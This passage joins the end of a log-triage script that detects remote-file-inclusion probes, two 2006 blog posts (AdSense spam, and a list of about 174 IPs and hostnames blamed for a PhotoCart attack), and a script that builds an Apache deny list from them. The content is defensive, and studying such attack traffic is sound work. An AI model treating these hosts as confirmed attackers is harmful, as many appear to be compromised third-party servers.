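    return [l for l in log_text.splitlines() if l.startswith(ip + " ")]


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for ip, path, targets in result["rfi"]:
        print("remote URL in query:", ip, path, targets)
    for ip, ref, signals in result["dorks"]:
        print("dork referer:", ip, signals, ref)
    print("\n".join(result["bots"]))
    print("\n".join(evidence(SAMPLE_LOG, "70.84.220.210")))
```

Pipe a day's access log through triage() and the bots list is the botnet table, the rfi list is what to put in the abuse report, and the dorks list tells you which fingerprint phrase on your own pages drew the scanner in (here the word "photocart" in a blog URL), which is the thing to consider removing or blocking for search-engine referers.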

Matt Cutts Says Google Dropping AdSense Web Spammers

There's a somewhat heated thread on WebmasterWorld for the past few days about the reasons for the continued survival of Made For AdSense (MFA) sites.

As luck would have it, and perfect timing, Matt Cutts made a post on his blog that included a phrase that I simply couldn't resist commenting about:

So how do we keep the tipping point firmly in the “Google is Good” range?
So I had to call Matt on this and ask the question:
How about getting rid of the Made For AdSense (MFA) sites that are the current scourge of the web and all the search engines?
Much to my surprise, Matt responded with something quite unexpected:
IncrediBILL, that’s a good example where we have a lot of internal discussion; I don’t want that sort of behavior rewarded either. About a month and a half ago, Google decided to pursue this more aggressively, and quite a few people have already been dropped from AdSense for webspam (violations of our quality guidelines). I’m sure I’ll have a chance to talk about it more in 2007. :)
Wow, you could've knocked me over with a feather!

Now THAT's a revelation that many of us battling the AdSense scrapers have been waiting to hear as the scrapers have been winning this battle to date.

Those people using automated scripts to scrape content from one site and generate thousands of AdSense webspam pages and sites a day should start looking for a new way to make money, as it appears their days in AdSense are numbered!

Keep your eye on WMW's AdSense forum for a rash of new threads about "Banned From AdSense" and they will bellyache loudly that they don't understand why their 10,000 sites with over 2 million "quality" web pages were dumped.

Here comes the next "I've Been Banned" thread in 5... 4... 3....

Kudos to Matt for fighting the good fight at Google, and we'll keep an eye on the many scraper sites posted in my blog to see if they get booted from AdSense.

Sunday, December 31, 2006

Complete Botnet List Used in PhotoCart Attack

This is probably a small botnet with only 174 IPs involved in currently trying to infect a single website using the PhotoCart vulnerability. I decided to show just how far these people are willing to go in order to attempt bypassing possible firewall blocks just to make sure one of them is successful.

Here's the complete botnet list:

140.117.73.1 [finance.nsysu.edu.tw.] requested 379 pages as "libwww-perl/5.805"
147.202.41.61 [x.xhort.com.] requested 29 pages as "libwww-perl/5.805"
158.66.1.12 [service2.mg.gov.pl.] requested 178 pages as "libwww-perl/5.65"
163.178.79.2 [unknown] requested 41 pages as "libwww-perl/5.803"
164.77.213.115 [unknown] requested 1 pages as "libwww-perl/5.805"
189.146.75.42 [dsl-189-146-75-42.prod-infinitum.com.mx.] requested 321 pages as "libwww-perl/5.803"
189.146.80.14 [dsl-189-146-80-14.prod-infinitum.com.mx.] requested 272 pages as "libwww-perl/5.803"
193.192.247.209 [209-sn-5-be.pchighway.com.] requested 1 pages as "libwww-perl/5.805"
194.108.42.38 [sip1.it-help.cz.] requested 7 pages as "libwww-perl/5.803"
194.152.183.230 [unknown] requested 19 pages as "libwww-perl/5.805"
194.177.97.82 [82-97-177-194.serverdedicati.seflow.net.] requested 87 pages as "libwww-perl/5.79"
195.10.193.5 [mailer.fastnetbg.com.] requested 36 pages as "libwww-perl/5.803"
195.206.96.40 [kabsieasy.aic.at.] requested 4 pages as "libwww-perl/5.63"
195.242.211.253 [faq.ecobike.de.] requested 64 pages as "libwww-perl/5.48"
195.242.98.223 [keurigonline07.nl.] requested 51 pages as "libwww-perl/5.79"
198.173.254.167 [sofsup.securesites.net.] requested 14 pages as "libwww-perl/5.65"
198.173.254.49 [gmotion.net.] requested 85 pages as "libwww-perl/5.65"
200.32.10.19 [200-32-10-19.prima.net.ar.] requested 29 pages as "libwww-perl/5.805"
200.73.10.171 [servidor2.icqnet.cl.] requested 39 pages as "libwww-perl/5.805"
200.75.49.133 [clientes_corpor_7549-133.etb.net.co.] requested 6 pages as "libwww-perl/5.64"
202.130.106.156 [unknown] requested 33 pages as "libwww-perl/5.79"
202.139.20.8 [nm8.shoalhaven.net.au.] requested 27 pages as "libwww-perl/5.805"
202.143.173.2 [unknown] requested 2 pages as "libwww-perl/5.65"
202.181.245.88 [unknown] requested 20 pages as "libwww-perl/5.805"
202.83.173.216 [ntc.net.pk.] requested 104 pages as "libwww-perl/5.65"
202.85.134.241 [mail.icreationasia.com.] requested 42 pages as "libwww-perl/5.65"
203.146.140.221 [besthost5.com.] requested 127 pages as "libwww-perl/5.64"
203.167.111.133 [133.111.167.203.assigned.static.eastern-tele.com.] requested 69 pages as "libwww-perl/5.79"
203.167.88.76 [unknown] requested 47 pages as "libwww-perl/5.65"
203.194.134.166 [unknown] requested 386 pages as "libwww-perl/5.65"
203.211.135.130 [130.203-211-135.static.qala.com.sg.] requested 5 pages as "libwww-perl/5.805"
203.223.133.18 [unknown] requested 41 pages as "libwww-perl/5.805"
203.88.121.128 [acr2.soho.aussiehq.net.au.] requested 43 pages as "libwww-perl/5.805"
204.11.234.28 [vn1133.fireboxhosting.com.] requested 159 pages as "libwww-perl/5.805"
204.157.36.20 [unknown20.36.157.204.defenderhosting.com.] requested 56 pages as "libwww-perl/5.805"
204.16.246.8 [gttcp18.30u.com.] requested 302 pages as "libwww-perl/5.805"
205.234.100.65 [unknown65.100.234.205.defenderhosting.com.] requested 64 pages as "libwww-perl/5.805"
205.234.223.229 [unknown.hostforweb.com.] requested 219 pages as "libwww-perl/5.805"
206.123.101.20 [server005.hostspectrum.com.] requested 84 pages as "libwww-perl/5.805"
206.222.19.42 [ns1.ultranetgroup.net.] requested 91 pages as "libwww-perl/5.79"
206.225.92.93 [206-225-92-93.dedicated.abac.net.] requested 330 pages as "libwww-perl/5.803"
207.158.61.3 [ns1.control8.com.] requested 160 pages as "libwww-perl/5.79"
207.99.63.90 [unknown] requested 31 pages as "libwww-perl/5.79"
208.101.29.107 [asprojectos.com.] requested 371 pages as "libwww-perl/5.805"
209.151.94.9 [poplar.vosn.net.] requested 337 pages as "libwww-perl/5.805"
209.172.35.53 [ip-209-172-35-53.reverse.privatedns.com.] requested 217 pages as "libwww-perl/5.79"
209.47.139.138 [server.privatelabelarticlesite.net.] requested 46 pages as "libwww-perl/5.805"
209.47.167.151 [server1.web-marketing-concepts.com.] requested 32 pages as "libwww-perl/5.805"
209.97.207.116 [cowboywebdesigns.com.] requested 48 pages as "libwww-perl/5.65"
210.172.116.244 [unknown] requested 59 pages as "libwww-perl/5.803"
212.12.121.43 [as01-14-212-12-121-43.ip.housing-manager.de.] requested 18 pages as "libwww-perl/5.803"
212.176.124.197 [PBOUL-Chumak2-gw.RoSprint.net.] requested 27 pages as "libwww-perl/5.805"
212.227.83.106 [p15188117.pureserver.info.] requested 130 pages as "libwww-perl/5.76"
212.25.170.80 [wnx-10.seeweb.it.] requested 41 pages as "libwww-perl/5.803"
213.186.116.86 [opel-club.colo.dc.utel.ua.] requested 31 pages as "libwww-perl/5.805"
213.228.142.27 [pal-213-228-142-27.netvisao.pt.] requested 18 pages as "libwww-perl/5.803"
213.234.229.221 [ns1.siriust.ru.] requested 33 pages as "libwww-perl/5.805"
216.16.246.154 [server154.ntouch.ca.] requested 35 pages as "libwww-perl/5.805"
216.17.109.39 [bo.phatservers.com.] requested 449 pages as "libwww-perl/5.805"
216.193.194.223 [abante.lunarpages.com.] requested 93 pages as "libwww-perl/5.805"
216.22.48.208 [216.22.48.208.servint.net.] requested 35 pages as "libwww-perl/5.805"
216.227.220.4 [xena.lunarpages.com.] requested 92 pages as "libwww-perl/5.805"
216.246.45.72 [unknown.scnet.net.] requested 38 pages as "libwww-perl/5.805"
216.55.166.52 [216-55-166-52.dedicated.abac.net.] requested 81 pages as "libwww-perl/5.803"
217.112.42.20 [unknown] requested 22 pages as "libwww-perl/5.79"
217.115.84.178 [mail.continentall.ru.] requested 26 pages as "libwww-perl/5.805"
217.128.167.99 [LPuteaux-151-42-8-99.w217-128.abo.wanadoo.fr.] requested 19 pages as "libwww-perl/5.803"
217.70.144.89 [serverclienti.com.] requested 25 pages as "libwww-perl/5.65"
218.38.14.205 [unknown] requested 93 pages as "libwww-perl/5.79"
219.93.90.33 [unknown] requested 36 pages as "libwww-perl/5.65"
219.94.128.150 [www910.sakura.ne.jp.] requested 150 pages as "libwww-perl/5.805"
220.134.22.185 [main.ethantw.tw.] requested 17 pages as "libwww-perl/5.805"
221.126.152.218 [unknown] requested 3 pages as "libwww-perl/5.65"
221.127.101.145 [unknown] requested 2 pages as "libwww-perl/5.65"
38.100.80.201 [spongebob.jewlzk.com.] requested 1 pages as "libwww-perl/5.805"
62.193.229.152 [host4.i-excom.net.] requested 158 pages as "libwww-perl/5.64"
62.221.213.68 [unknown] requested 34 pages as "libwww-perl/5.65"
62.4.70.180 [62.4.70.180.fantasyvirtual.com.] requested 153 pages as "libwww-perl/5.803"
62.94.87.159 [159reverse.gestinweb.it.] requested 17 pages as "libwww-perl/5.805"
63.246.154.22 [ukrainehosting.info.] requested 6 pages as "libwww-perl/5.805"
63.247.138.144 [excalibur.rtsdns.net.] requested 48 pages as "libwww-perl/5.805"
64.191.28.101 [brick5.hostnoc.net.] requested 140 pages as "libwww-perl/5.805"
64.191.56.190 [cricket.sulteia.com.] requested 4 pages as "libwww-perl/5.805"
64.235.234.128 [gemini.lunarpages.com.] requested 186 pages as "libwww-perl/5.805"
64.34.161.52 [img.iuploads.com.] requested 80 pages as "libwww-perl/5.805"
64.38.11.6 [managed.voipbiz.us.] requested 1 pages as "libwww-perl/5.79"
64.38.24.138 [server1.caribehost.com.] requested 62 pages as "libwww-perl/5.805"
64.8.114.12 [64-8-114-12.yourhostingprovider.net.] requested 142 pages as "libwww-perl/5.801"
64.8.114.14 [web-06.ihservers.com.] requested 238 pages as "libwww-perl/5.801"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 773 pages as "libwww-perl/5.801"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 1188 pages as "libwww-perl/5.801"
64.8.124.64 [64-8-124-64.yourethehost.net.] requested 82 pages as "libwww-perl/5.801"
65.38.168.212 [2yellow.veraserve.com.] requested 72 pages as "libwww-perl/5.805"
65.42.183.2 [walrus.bytehead.com.] requested 300 pages as "libwww-perl/5.79"
65.99.196.23 [unknown] requested 89 pages as "libwww-perl/5.805"
66.103.152.111 [server22.internet-hosting-services.com.] requested 281 pages as "libwww-perl/5.805"
66.151.255.65 [server.by016.net.] requested 3 pages as "libwww-perl/5.805"
66.159.142.166 [66-159-142-166.adsl.snet.net.] requested 1 pages as "libwww-perl/5.803"
66.234.10.177 [ns7.digicc.net.] requested 49 pages as "libwww-perl/5.65"
66.235.206.151 [host223.ipowerweb.com.] requested 66 pages as "libwww-perl/5.805"
66.235.221.231 [host131.ipowerweb.com.] requested 107 pages as "libwww-perl/5.805"
66.240.252.55 [su9325255.aspadmin.net.] requested 12 pages as "libwww-perl/5.803"
66.254.98.142 [angels.reflected.net.] requested 132 pages as "libwww-perl/5.803"
66.40.38.148 [host148.maxim.net.] requested 19 pages as "libwww-perl/5.65"
66.55.78.18 [66-55-78-18.yourhostingprovider.net.] requested 89 pages as "libwww-perl/5.801"
66.7.193.220 [interzone.shiftinteractive.net.] requested 170 pages as "libwww-perl/5.805"
66.70.121.80 [unknown] requested 96 pages as "libwww-perl/5.65"
67.159.26.45 [sanalsistem.net.] requested 7 pages as "libwww-perl/5.805"
67.159.26.99 [.] requested 62 pages as "libwww-perl/5.805"
67.18.16.82 [srv24.icx.pl.] requested 1 pages as "libwww-perl/5.805"
67.19.224.66 [lamda.asmallorange.com.] requested 84 pages as "libwww-perl/5.805"
67.19.65.132 [84.41.1343.static.theplanet.com.] requested 433 pages as "libwww-perl/5.805"
67.19.74.138 [www2.comradelycertitude.com.] requested 227 pages as "libwww-perl/5.805"
67.19.85.196 [c4.55.1343.static.theplanet.com.] requested 343 pages as "libwww-perl/5.805"
68.179.54.20 [static-68-179-54-20.ptr.terago.ca.] requested 123 pages as "libwww-perl/5.65"
68.186.32.50 [68-186-32-50.static.scrm.ca.charter.com.] requested 61 pages as "libwww-perl/5.79"
69.10.142.59 [unknown.rackforce.com.] requested 187 pages as "libwww-perl/5.805"
69.13.6.170 [unknown] requested 136 pages as "libwww-perl/5.53"
69.26.178.210 [iota.sitelutions.com.] requested 304 pages as "libwww-perl/5.805"
69.56.180.222 [de.b4.3845.static.theplanet.com.] requested 131 pages as "libwww-perl/5.805"
69.93.107.114 [72.6b.5d45.static.theplanet.com.] requested 5 pages as "libwww-perl/5.805"
70.84.122.194 [web1.titansolutions.net.] requested 267 pages as "libwww-perl/5.805"
70.84.220.210 [d2.dc.5446.static.theplanet.com.] requested 518 pages as "libwww-perl/5.805"
70.85.247.250 [fa.f7.5546.static.theplanet.com.] requested 35 pages as "libwww-perl/5.805"
70.85.66.162 [wobbuffet-202.pokemonpalace.net.] requested 205 pages as "libwww-perl/5.805"
70.86.151.130 [82.97.5646.static.theplanet.com.] requested 722 pages as "libwww-perl/5.65"
70.86.36.194 [titan.websiteactive.com.] requested 155 pages as "libwww-perl/5.805"
72.22.69.189 [host503.ipowerweb.com.] requested 63 pages as "libwww-perl/5.76"
72.232.141.146 [146.141.232.72.reverse.layeredtech.com.] requested 54 pages as "libwww-perl/5.805"
72.232.178.114 [bullfrog.frogee.com.] requested 27 pages as "libwww-perl/5.805"
72.232.233.170 [g1.eth4.colo1.cust3.fuzionservers.com.] requested 171 pages as "libwww-perl/5.805"
72.249.16.108 [actstwo.com.] requested 32 pages as "libwww-perl/5.805"
72.29.66.235 [bravo.dnshttp.com.] requested 31 pages as "libwww-perl/5.805"
72.29.71.74 [ggs-t.ggs-t.com.] requested 31 pages as "libwww-perl/5.805"
72.29.74.43 [deso.surpasshosting.com.] requested 61 pages as "libwww-perl/5.805"
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 445 pages as "libwww-perl/5.805"
72.29.82.174 [pass57.dizinc.com.] requested 4 pages as "libwww-perl/5.805"
72.29.83.98 [jet33.hasweb.com.] requested 254 pages as "libwww-perl/5.805"
72.3.249.214 [ashopsoftware.com.] requested 50 pages as "libwww-perl/5.65"
72.35.81.67 [www70.privatelabeldns.com.] requested 235 pages as "libwww-perl/5.79"
72.36.156.123 [osd1.myhostcenter.com.] requested 98 pages as "libwww-perl/5.805"
72.5.54.51 [web13.lx.host.inap.sea.dotster.net.] requested 149 pages as "libwww-perl/5.65"
72.51.34.179 [unknown] requested 11 pages as "libwww-perl/5.79"
72.51.35.81 [ssnakess.com.] requested 325 pages as "libwww-perl/5.805"
74.52.1.10 [buycheaperwebhosting.com.] requested 58 pages as "libwww-perl/5.805"
74.52.133.146 [92.85.344a.static.theplanet.com.] requested 115 pages as "libwww-perl/5.805"
74.52.208.138 [8a.d0.344a.static.theplanet.com.] requested 3 pages as "libwww-perl/5.805"
74.52.68.106 [theshire.caffeinepress.co.uk.] requested 213 pages as "libwww-perl/5.805"
74.52.84.138 [8a.54.344a.static.theplanet.com.] requested 16 pages as "libwww-perl/5.805"
76.169.115.66 [cpe-76-169-115-66.socal.res.rr.com.] requested 81 pages as "libwww-perl/5.65"
80.239.140.226 [megahost.pl.] requested 14 pages as "libwww-perl/5.803"
80.39.80.183 [183.Red-80-39-80.staticIP.rima-tde.net.] requested 12 pages as "libwww-perl/5.65"
80.77.86.243 [unknown] requested 104 pages as "libwww-perl/5.805"
81.169.186.195 [moncserver.de.] requested 557 pages as "libwww-perl/5.803"
81.181.15.6 [unknown] requested 96 pages as "libwww-perl/5.805"
81.181.89.42 [unknown] requested 208 pages as "libwww-perl/5.805"
81.183.219.157 [dsl51B7DB9D.fixip.t-online.hu.] requested 106 pages as "libwww-perl/5.803"
81.208.31.216 [81-208-31-216.ip.fastwebnet.it.] requested 8 pages as "libwww-perl/5.79"
82.165.231.16 [u15174557.onlinehome-server.com.] requested 122 pages as "libwww-perl/5.79"
82.165.27.174 [p15173001.pureserver.info.] requested 36 pages as "libwww-perl/5.76"
82.165.36.226 [russellgrantastrology.com.] requested 147 pages as "libwww-perl/5.65"
82.210.7.28 [82.210.7.28.rev.worldbone.de.] requested 29 pages as "libwww-perl/5.803"
83.138.166.13 [s79719.lovehorse.co.uk.] requested 41 pages as "libwww-perl/5.79"
83.15.63.115 [eih115.internetdsl.tpnet.pl.] requested 5 pages as "libwww-perl/5.803"
83.65.104.210 [83-65-104-210.klagenfurt-nord.xdsl-line.inode.at.] requested 55 pages as "libwww-perl/5.69"
85.214.19.18 [copyworld-kiel.de.] requested 294 pages as "libwww-perl/5.69"
85.25.134.185 [alpha961.server4you.de.] requested 23 pages as "libwww-perl/5.803"
87.236.194.104 [unassigned-87.236.194.104.coolhousing.net.] requested 55 pages as "libwww-perl/5.805"
88.149.156.142 [www.futurweb.info.] requested 24 pages as "libwww-perl/5.803"
89.108.80.229 [server2.vlr.ru.] requested 40 pages as "libwww-perl/5.805"
89.207.232.18 [unknown] requested 37 pages as "libwww-perl/5.79"
I haven't fully processed this list yet, but 17 of these IPs are in blocks assigned to theplanet.com.

What I find most amusing here is that we hear so much about compromised home computers being involved in botnets, and yet this batch, for the most part, appears to be primarily dedicated servers in data centers.

This just verifies what I've been preaching about blocking access to your server from data centers, as they are a source of many problems, from scrapers to hackers.
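As an added example (not the author's own log tool, whose source the post does not show), here is a small Python script that parses summary lines in the exact shape printed above, tallies them by reverse-DNS parent domain and by libwww-perl version, flags the IPs whose rDNS falls under a hosting provider, and emits an Apache .htaccess deny fragment for them. The sample lines are a subset copied from the list above; the hosting-suffix list (theplanet.com, ipowerweb.com) is an assumption chosen for the demo, and the last-two-labels domain heuristic is deliberately naive.

```python
import re
from collections import Counter

# Constructed sample: a handful of lines copied from the summary list above.
# The post's tool printed lines in this shape; LINE_RE parses that shape.
SAMPLE = """\
65.99.196.23 [unknown] requested 89 pages as "libwww-perl/5.805"
67.19.65.132 [84.41.1343.static.theplanet.com.] requested 433 pages as "libwww-perl/5.805"
67.19.85.196 [c4.55.1343.static.theplanet.com.] requested 343 pages as "libwww-perl/5.805"
67.159.26.99 [.] requested 62 pages as "libwww-perl/5.805"
69.56.180.222 [de.b4.3845.static.theplanet.com.] requested 131 pages as "libwww-perl/5.805"
70.86.151.130 [82.97.5646.static.theplanet.com.] requested 722 pages as "libwww-perl/5.65"
72.22.69.189 [host503.ipowerweb.com.] requested 63 pages as "libwww-perl/5.76"
76.169.115.66 [cpe-76-169-115-66.socal.res.rr.com.] requested 81 pages as "libwww-perl/5.65"
"""

# rDNS suffixes treated as "data center" origins. This list is an assumption
# for the demo; the post names theplanet.com but supplies no such list.
HOSTING_SUFFIXES = ("theplanet.com", "ipowerweb.com")

LINE_RE = re.compile(
    r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \[(?P<host>[^\]]*)\] '
    r'requested (?P<pages>\d+) pages? as "(?P<ua>[^"]*)"$'
)


def parse(text):
    """Parse summary lines into dicts; non-matching lines (commentary) are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            row = m.groupdict()
            row["pages"] = int(row["pages"])
            rows.append(row)
    return rows


def parent_domain(host):
    """Last two labels of an rDNS name, or None when there was no usable PTR
    ('unknown' or a bare '.' as seen in the list). Naive for ccSLDs like co.uk."""
    h = host.rstrip(".")
    if not h or h == "unknown":
        return None
    return ".".join(h.split(".")[-2:])


def count_by_parent_domain(rows):
    return Counter(parent_domain(r["host"]) or "(no rDNS)" for r in rows)


def pages_by_parent_domain(rows):
    c = Counter()
    for r in rows:
        c[parent_domain(r["host"]) or "(no rDNS)"] += r["pages"]
    return c


def count_by_ua_version(rows):
    """Group by the version string after 'libwww-perl/'."""
    return Counter(r["ua"].split("/", 1)[1] if "/" in r["ua"] else r["ua"] for r in rows)


def datacenter_ips(rows, suffixes=HOSTING_SUFFIXES):
    """IPs whose rDNS ends in a known hosting suffix. The netblock owner controls
    rDNS, so a customer's custom PTR (or a missing one) slips past this check;
    a WHOIS/ASN lookup is the authoritative way to attribute an IP to a block."""
    hits = set()
    for r in rows:
        h = r["host"].rstrip(".").lower()
        if any(h == s or h.endswith("." + s) for s in suffixes):
            hits.add(r["ip"])
    return sorted(hits, key=lambda ip: tuple(int(o) for o in ip.split(".")))


def htaccess_deny(ips):
    """Apache 2.2-style .htaccess fragment denying the listed IPs."""
    lines = ["Order Allow,Deny", "Allow from all"]
    lines += ["Deny from %s" % ip for ip in ips]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    rows = parse(SAMPLE)
    print("by rDNS parent domain:", count_by_parent_domain(rows).most_common())
    print("pages by parent domain:", pages_by_parent_domain(rows).most_common())
    print("by libwww-perl version:", count_by_ua_version(rows).most_common())
    ips = datacenter_ips(rows)
    print("data-center IPs:", ips)
    print(htaccess_deny(ips))
```

Run against the full list above, the rDNS tally will undercount theplanet.com relative to the post's WHOIS-based figure of 17, because several of those IPs carry customer-chosen PTR names; that gap is exactly why a suffix match on rDNS should be a first pass, with netblock ownership (WHOIS or ASN data) used to build the actual deny list.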